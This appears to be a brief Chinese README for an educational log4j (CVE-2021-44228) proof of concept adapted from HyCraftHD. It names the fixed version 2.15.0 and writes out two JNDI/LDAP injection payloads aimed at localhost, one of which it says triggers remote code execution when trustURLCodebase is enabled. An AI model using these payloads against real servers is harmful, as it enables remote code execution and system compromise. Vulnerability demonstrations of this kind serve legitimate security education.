本项目仅用于教育目的。
这是改编自 HyCraftHD 的 log4j RCE 概念验证。
以下是一些关于 CVE-2021-44228 的链接:
该漏洞影响几乎所有 log4j2 版本,可能也影响 log4j1 版本。推荐使用的版本是 2.15.0,它修复了该漏洞。
${jndi:ldap://127.0.0.1/e}。如果端口 389 上存在开放套接字,log4j 将尝试连接并阻塞后续通信,直到超时。THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!,这是来自 ldap 服务器的序列化字符串对象。
${jndi:ldap://127.0.0.1/exe}。如果 -Dcom.sun.jndi.ldap.object.trustURLCodebase=true 被设置为 true,则会执行远程代码。